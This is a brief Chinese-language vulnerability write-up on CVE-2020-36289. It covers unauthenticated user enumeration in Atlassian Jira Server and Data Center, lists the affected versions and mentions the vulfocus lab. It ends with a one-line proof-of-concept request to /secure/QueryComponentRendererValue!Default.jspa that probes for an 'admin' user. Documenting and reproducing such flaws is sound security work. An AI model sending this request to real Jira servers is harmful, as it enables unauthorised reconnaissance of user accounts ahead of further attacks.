0x01 漏洞描述

受影响的 Atlassian Jira 服务器和数据中心版本允许未经身份验证的用户通过 QueryComponentRendererValue!Default.jspa 端点中的信息披露漏洞枚举用户。受影响的版本为 8.5.13 之前的版本、8.13.5 之前的 8.6.0 版本以及 8.15.1 之前的 8.14.0 版本。

0x02 漏洞影响

CVE-2020-36289

vulfocus

Jira < 8.5.13

8.6.0 ≤ Jira < 8.13.5

8.14.0 ≤ Jira < 8.15.1

0x03 漏洞复现

poc

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

Untitled